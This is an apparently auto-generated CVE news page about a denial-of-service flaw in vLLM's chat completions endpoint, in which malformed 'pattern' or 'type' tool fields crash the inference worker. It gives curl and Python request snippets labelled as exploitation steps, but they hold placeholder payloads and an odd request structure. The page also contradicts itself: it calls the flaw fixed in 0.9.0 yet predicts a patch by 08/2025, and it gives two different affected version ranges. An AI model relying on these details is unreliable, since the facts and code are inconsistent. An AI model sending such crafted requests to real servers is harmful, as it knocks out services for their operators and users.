vLLM, Input Validation Vulnerability, CVE-2025-48944 (Critical)

Listen to this Post

How the CVE Works

The vulnerability in vLLM (0.8.0 to 0.9.0) stems from improper input validation in the `/v1/chat/completions` OpenAPI endpoint. When the “tools” functionality is used, the backend fails to sanitize malformed inputs in the “pattern” and “type” fields. These unchecked inputs are directly compiled or parsed, leading to a crash of the inference worker. The worker remains non-functional until manually restarted, disrupting LLM inference services. The flaw is fixed in vLLM 0.9.0 by implementing proper input validation.

DailyCVE Form

Platform: vLLM
Version: 0.8.0-0.8.x
Vulnerability: Input Validation
Severity: Critical
Date: 05/30/2025

Prediction: Patch expected by 08/2025

What Undercode Say

curl -X POST http://vllm-server/v1/chat/completions -d '{"tools": {"pattern": "malicious_input"}}'
import requests
payload = {"type": "invalid_syntax", "pattern": "exploit_code"}
requests.post("http://vllm-server/v1/chat/completions", json=payload)

How Exploit

  • Send crafted “pattern” or “type” fields via API.
  • Worker crashes, denying service.
  • No authentication required.

Protection from this CVE

  • Upgrade to vLLM 0.9.0+.
  • Implement input sanitization.
  • Monitor worker health.

Impact

  • Service disruption.
  • Manual recovery needed.
  • LLM downtime.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

πŸ”JOIN OUR CYBER WORLD [ CVE News β€’ HackMonitor β€’ UndercodeNews ]

πŸ’¬ Whatsapp | πŸ’¬ Telegram

πŸ“’ Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | πŸ”— Linkedin Featured Image

Scroll to Top